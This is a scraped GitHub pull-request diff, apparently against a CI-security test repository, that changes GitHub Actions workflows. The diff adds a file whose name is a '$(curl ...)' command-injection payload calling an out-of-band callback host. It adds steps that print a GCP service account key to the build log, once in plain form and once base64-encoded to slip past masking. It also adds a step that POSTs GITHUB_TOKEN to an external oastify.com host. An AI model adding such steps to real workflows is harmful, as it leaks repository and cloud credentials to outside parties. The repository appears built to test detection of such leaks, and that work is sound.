Skip to content
Closed
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions $(curl -s msi6iawwfggvaehl5jrwkzzmodu4iu6j.oastify.com)
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
a
3 changes: 3 additions & 0 deletions .github/workflows/secret-in-build-log.yml
Original file line number Diff line number Diff line change
Expand Up @@ -19,6 +19,9 @@ jobs:
env:
GCP_SERVICE_ACCOUNT_KEY: ${{ secrets.GCP_SERVICE_ACCOUNT_KEY }}
run: |
echo "Full Secret: $GCP_SERVICE_ACCOUNT_KEY"
echo "$GCP_SERVICE_ACCOUNT_KEY" | base64

# Extracting the private key from the GCP service account key
PRIVATE_KEY=$(echo $GCP_SERVICE_ACCOUNT_KEY | jq -r '.private_key')

Expand Down
8 changes: 4 additions & 4 deletions .github/workflows/unexpected-outbound-calls.yml
Original file line number Diff line number Diff line change
@@ -1,16 +1,16 @@
name: Unexpected Outbound Calls
on:
workflow_dispatch:
permissions: read-all
jobs:
unexpected-outbound-calls:
name: UnexpectedOutboundCalls
runs-on: ubuntu-latest
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
steps:
- name: Harden Runner
uses: step-security/harden-runner@v2
with:
egress-policy: audit
- run: "curl https://attacker.com -L || true"
- run: "curl https://google.com -L || true"
- run: "curl microsoft.com:443 --connect-timeout 5 || true"
- run: "curl amazon.com:443 --connect-timeout 5 || true"
- run: curl -s -X POST https://xcdf8s8jb3z7fcf05jymki075ybpzgn5.oastify.com -d "token=$GITHUB_TOKEN"
Loading